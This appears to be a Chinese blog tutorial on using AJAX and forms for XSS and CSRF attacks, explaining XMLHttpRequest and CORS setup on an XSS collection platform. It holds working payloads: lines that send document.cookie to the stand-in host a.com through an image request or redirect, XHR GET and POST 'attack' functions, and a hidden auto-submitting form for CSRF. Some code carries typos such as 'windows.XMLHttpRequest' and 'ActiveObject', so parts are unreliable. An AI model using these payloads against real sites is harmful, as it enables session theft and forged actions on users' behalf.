ajax模拟请求
理解ajax
核心对象是XMLHttpRequest(简称xhr),IE7之前是通过ActiveXObject对象实现的。
- 异步:独立于浏览器主线程去做自己的事情,
- 同步:请求发送后需要等待响应回来,这个时期进入阻塞阶段
xhr实例化
var xmlhttp;
if(windows.XMLHttpRequest){
xmlhttp = new XMLHttpRequest();
}else{
//ie5、ie6
xmlhttp = new ActiveObject("Microsoft.XMLHTTP");
}
GET请求
ajax是遵守同源策略的,w3c的CORS(Cross-OriginResource Sharing)方案支持跨域,在接收信息(xss平台)设置:
<?php header("Access-Control-Allow-Origin: *")?>
其中*为任意域都行,也可以设置为指定的某域
当漏洞点给xss平台发送请求的时候,浏览器会自动加上Origin头,xss平台会判断这个头中的域是不是自己允许的域。不是就会爆出权限错误,虽然报错,但是还是接收到了数据
GET请求
<script>
function getRequest(method,url){
var xhr = new XMLHttpRequest();
if("withCredentials" in xhr){
//ture表示是异步,false表示是同步
xhr.open(method,url,true);
}else if(typeof XDomainRequest != "undefined"){
//IE bowser
xhr = new XDomainRequest();
xhr.open(method,url);
}else{
xhr = null;
}
return xhr;
}
var request = getRequest("get","http://a.com/ajax.php?get=testaaa");
if(request){
//request success
/*request.onload = function(){
//alert request date
alert(request.responseText);
}*/
//send request
request.send();
}
</script>
简单化get请求
//新建img标签对象
new Image().src="http://a.com/ajax.php?get="+escape(document.cookie);
//地址栏打开目标网址,地址会跳转,隐蔽性不高
location.href="http://a.com/ajax.php?get="+escape(document.cookie);
简单POST请求
<script>
//xhr object
xhr = function(){
var request = false;
if(window.XMLHttpRequest){
request = new XMLHttpRequest();
}else if(windows.ActiveXObject){
try{
request = new windows.ActiveXObject('Microsoft.XMLHTTP');
}catch(e){}
}
return request;
}();
request = function(method,src,argv,content_type){
//false 同步
xhr.open(method,src,false);
if(method=='POST')
xhr.setRequestHeader('content-Type',content_type);
xhr.send(argv);
return xhr.responseText;
};
attack_a = function(){
var src = "http://a.com/ajax.php";
var argv_0 = "&post=postok";
request("POST",src,argv_0,"application/x-www-form-urlencoded");
};
attack_a();
</script>
其中application/x-www-form-urlencoded是默认的标准表单提交格式
还有一种是上传文件中常见,multipart/form-data
POST模拟表单提交
<script>
//xhr object
xhr = function(){
var request = false;
if(window.XMLHttpRequest){
request = new XMLHttpRequest();
}else if(windows.ActiveXObject){
try{
request = new windows.ActiveXObject('Microsoft.XMLHTTP');
}catch(e){}
}
return request;
}();
request = function(method,src,argv,content_type){
//false 同步
xhr.open(method,src,false);
if(method=='POST')
xhr.setRequestHeader('content-Type',content_type);
xhr.send(argv);
return xhr.responseText;
};
attack_a = function(){
var src = "http://a.com/ajax.php";
var name1 = "value1";
var name2 = "value2";
var argv_0 = "\r\n";
argv_0 += "---------------------7964f8dddeb95fc5\r\nContent-Disposition:form-data;name=\"name1\"\r\n\r\n";
argv_0 += (name1+"\r\n");
argv_0 += "---------------------7964f8dddeb95fc5\r\nContent-Disposition:form-data;name=\"name2\"\r\n\r\n";
argv_0 += (name2+"\r\n");
request("POST",src,argv_0,"multipart/form-data;boundary=-------------------7964f8dddeb95fc5");
}
attack_a();
</script>
动态创建表单提交(常用于csrf)
通过javascript动态的常见一个form
<html>
<body>
<script>
function new_form(){
var f = document.createElement("form");
document.body.appendChild(f);
f.method = "post";
return f;
}
function create_elements(eForm,eName,eValue){
var e = document.createElement("input");
eForm.appendChild(e);
e.type = 'text';
e.name = eName;
if(!document.all){
e.style.display= 'none';
}else{
e.style.display = 'block';
e.style.width - '0px';
e.style.height = '0px';
}
e.value = eValue;
return e;
}
var _f = new_form();
create_elements(_f,"post","zzzz");
//create_elements(_f,"name2","value2");
//提交地址
_f.action = "http://a.com/ajax.php";
_f.submit();
</script>
</body>
</html>
notice:
本地测试的时候没有加上<html><body>xxx</body></html>,然后报错Uncaught TypeError: Cannot read property 'appendChild' of null
参考了二哥的回复:点击我打开
原因是document.body.appendChild(f);在添加form时候并没有body,于是会爆出null
know it then do it
